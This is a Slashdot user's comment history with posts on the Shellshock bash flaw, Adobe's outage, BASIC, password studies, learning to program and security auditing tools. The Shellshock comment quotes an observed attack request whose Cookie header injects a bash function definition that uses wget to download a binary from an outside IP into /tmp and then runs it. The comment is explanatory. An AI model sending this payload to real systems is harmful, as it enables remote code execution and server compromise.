Forgot your password?
typodupeerror

Comment: Yes it is being exploited (Score 5, Informative) 316

by xanthos (#47996085) Attached to: Flurry of Scans Hint That Bash Vulnerability Could Already Be In the Wild

There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.

The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.

An example attack:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;

Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and and a have a simple one-liner to test if a system is vulnerable.

Comment: Adobe better take a look at their SLA (Score 3, Insightful) 74

by xanthos (#47018895) Attached to: Adobe Creative Cloud Is Back

If one of our sites was down for as long as Adobe's was, heads would roll.

What took so long to restore? Crappy process for restoring server images or recovering a database?

Or, as others have speculated, was there a security breach and they couldn't bring it back up until all the evidence was gathered and the vulnerability was closed.

Oh wait, this is Adobe we are talking about. Their code doesn't have vulnerabilities.

Comment: Remember, the B in BASIC is for Beginners (Score 1) 146

by xanthos (#46707301) Attached to: Born To RUN: Dartmouth Throwing BASIC a 50th B-Day Party

Surprised at the number of hateful comments regarding BASIC. Even when it was created it was aimed at novices not experts, hence the name: Beginners All-purpose Symbolic Instruction Code. The true value was that the simple syntax made learning programming concepts much simpler. I used to teach a beginning programming class in the 80's that used BASIC. I always felt that I was able to instill a better understanding of what was going on with the simple Line # VERB parameter syntax of the early language. Breaking things down only four Verb types ( Definition, Assignment, I/O, Control) , the operators, and the two type of variables/constants (string/numeric). That's all there is folks. Would I want to try and write a compiler in it, no, but that is not what the language was written for.

Dinosaur trivia points: why do loops commonly use the variable i. (Hint: int does not stand for index.)

Comment: False Conclusion (Score 1) 299

by xanthos (#45576993) Attached to: Why People Are So Bad At Picking Passwords

I hate studies like this. Do people pick common passwords, of course they do. Does everyone pick an easy to guess password, of course not. Can it be blindly determined, for any given user, if their password is "simple" or "complex"? No.

The article puts the blame on the end user, when the truth is the problem is with the websites storing the passwords in plain text or as un-salted hashes and not locking out brute force attacks. What the researchers are really arguing is that
    1) your account may be compromised if hackers break into the website and steal all the passwords.
    2) your password might be easier to guess if it is related to you, hackers are targeting you personally (not likely), and the website doesn't lock the account out.

Don't blame the user, blame the developers and administrators for being lazy and/or inept and failing to protect people from themselves.

Comment: Ollevetti! (Score 2) 623

by xanthos (#43852217) Attached to: How Did You Learn How To Program?

I started about the same time on a Ollevetti 401 I believe. A glorified numeric key pad for input and a red light, a green light and a cash register style tape for output.

I believe you will never really understand how a computer works until you have done two things:
built a compiler/parser and have done machine language programming (which was what you did with the 401).

Comment: Go check out sectools.org (Score 2) 116

by xanthos (#43282603) Attached to: Ask Slashdot: Do-It-Yourself Security Auditing Tools?

Sectools.org has a comprehensive list of tools with explanations of what each one does. Look at the web tools and the vulnerability scanners and you will find something you feel comfortable using. Most of the other tools mentioned so far can be found there. Also, the Open Web Applicaiton Security project (owasp.org) has some good information on secure app development.

good luck.

Our business in life is not to succeed but to continue to fail in high spirits. -- Robert Louis Stevenson

Working...